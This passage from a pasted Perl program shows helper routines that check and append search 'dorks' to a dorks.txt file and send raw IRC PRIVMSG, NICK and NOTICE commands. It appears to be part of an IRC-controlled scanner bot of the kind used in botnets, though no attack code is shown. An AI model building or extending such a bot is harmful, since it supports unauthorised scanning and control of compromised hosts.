  10783.         open (file,"<$file");
  10784.  
  10785.         while (my $dorkx=<file>) {
  10786.  
  10787.                 chop($dorkx);
  10788.  
  10789.                 if ($dorkx =~ /$dork/){
  10790.  
  10791.                 $success = 1;
  10792.  
  10793.                 }
  10794.  
  10795.         }
  10796.  
  10797.         close file;
  10798.  
  10799.         return $success;
  10800.  
  10801. }
  10802.  
  10803.  
  10804.  
  10805. sub write_dorks() {
  10806.  
  10807.         my $dorks = uri_escape($_[0]);
  10808.  
  10809.         my $file = "dorks.txt";
  10810.  
  10811.         open (filex,">>$file");
  10812.  
  10813.         print filex $dorks."\n";
  10814.  
  10815.         close filex;
  10816.  
  10817. }
  10818.  
  10819.  
  10820.  
  10821. sub msg() {
  10822.  
  10823.     return unless $#_ == 1;
  10824.  
  10825.     sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
  10826.  
  10827. }
  10828.  
  10829.  
  10830.  
  10831. sub nick() {
  10832.  
  10833.     return unless $#_ == 0;
  10834.  
  10835.     sendraw("NICK $_[0]");
  10836.  
  10837. }
  10838.  
  10839.  
  10840.  
  10841. sub notice() {
  10842.  
  10843.     return unless $#_ == 1;
  10844.  
  10845.     sendraw("NOTICE $_[0] :$_[1]");
  10846.  
  10847. }
Add Comment
Please, Sign In to add comment